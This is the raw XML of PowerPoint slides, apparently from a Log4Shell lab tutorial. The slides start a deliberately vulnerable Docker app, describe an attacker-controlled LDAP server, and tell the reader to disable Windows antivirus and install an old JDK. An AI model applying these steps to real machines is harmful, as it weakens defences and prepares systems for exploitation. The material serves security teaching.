            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5670692" y="3402144"/>
                <a:ext cx="72000" cy="72000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFDB62FA-4CD7-4EE3-A0F8-000566454FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865990" y="189468"/>
            <a:ext cx="4474879" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start the vulnerable app in a docker container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3952469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C90810-6726-DCF9-19E0-23B8F3DD4A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="2478316"/>
            <a:ext cx="10172700" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--name vulnerable-app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p 8080:8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@sha256:..9929</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4086FC14-88CA-9455-0AB7-6BDFA9F67670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251200" y="1278374"/>
            <a:ext cx="1940560" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>name of the Docker container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45EB1EFD-A979-A920-6660-B228D11DB151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221480" y="1924705"/>
            <a:ext cx="726440" cy="553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3D8B36-1D8F-0586-238E-F725D7279D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264053" y="447377"/>
            <a:ext cx="2377440" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>tells Docker to automatically remove the container when it stops running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B80449-40B9-923F-535C-304658685F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452773" y="1647706"/>
            <a:ext cx="709930" cy="8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EC439B-BE68-B8C4-6002-F61C126525F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8034215" y="401210"/>
            <a:ext cx="3899878" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maps ports between the host machine and the container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can access the web application using localhost or the host machine's IP address; http://&lt;host_ip&gt;:8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADC2BD4-08F8-A7FB-FCA7-A179296F4418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9489440" y="1739846"/>
            <a:ext cx="843280" cy="850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8914C-B6AA-74D4-1055-250F51835359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="4416922"/>
            <a:ext cx="2705100" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>the container is based on an image located at the specified URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC73D0CB-E1A6-A4D6-6C4C-E52FE3AE88DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1341120" y="3678645"/>
            <a:ext cx="1021080" cy="738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72C8510-66A9-69BA-D7B4-35EF05241E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790440" y="4232256"/>
            <a:ext cx="1813560" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the container is tagged with a specific hash code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1851CA9-7BAE-471F-9886-1499CFCC721C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4145280" y="3678645"/>
            <a:ext cx="1551940" cy="553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30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20653-A05C-2FBB-3781-110638212E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134950" y="650659"/>
            <a:ext cx="9922100" cy="6119390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F25D976-D8DB-4B5B-D06D-3A5716DDDD96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134950" y="248112"/>
            <a:ext cx="3019224" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verify the container is running</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2437153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70ED-BD53-3610-50A6-40B2FDCE87F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. Set up an LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77B1E7C-DD8D-5BE2-0CF7-04FE8F29EE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server is controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to disable Windows security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninstall JDK if the JDK version is not 1.8.0_202</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1546748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27BF5-1AF2-8FC2-2A5B-0A0209FCB84A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140877" y="578873"/>
            <a:ext cx="7910245" cy="5700254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56279BA-E5A5-D769-2969-8EA7C6759DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140877" y="209541"/>
            <a:ext cx="3273525" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Disable Virus &amp; threat protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4207949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41C9F8-2A88-F935-FB15-32319E789667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963781" y="0"/>
            <a:ext cx="8264438" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4545423F-F9A3-D6FB-3CB3-2BAD4E5E7653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963781" y="0"/>
            <a:ext cx="1395960" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Uninstall JDK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3166106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CC7BF7-8B17-383A-0840-498019C506CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="837744" y="1245681"/>
            <a:ext cx="10516511" cy="4366638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60DD6BC-3CE7-7D7D-D330-BB03AE4734BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5728677" y="5761112"/>
            <a:ext cx="6174154" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html#license-lightbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02EBE7AE-1214-1579-FFB6-AB3E81B46DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837744" y="727556"/>
            <a:ext cx="2517741" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Download JDK 1.8.0_202</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2710305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3076A7-23FB-120B-334B-09697D0D9112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031889" y="2245678"/>
            <a:ext cx="9561716" cy="2366643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A96A844-6288-8E0B-C671-6FBF763E619E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031889" y="1692756"/>
            <a:ext cx="1851276" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verify JDK version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3854271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Download Download Now Download Icon Royalty-Free Stock  Illustration Image - Pixabay">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F96C7E-CEC0-3012-596D-6EE010E0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878" y="1859280"/>
            <a:ext cx="1462723" cy="1462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CDBA9F-3C09-2B8D-9A7D-AA16638A612E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226560" y="2359808"/>
            <a:ext cx="2403800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Click to download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E76DDA-42A4-8578-D7B0-CC314269911E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850512" y="3717245"/>
            <a:ext cx="6313808" cy="1718476"/>
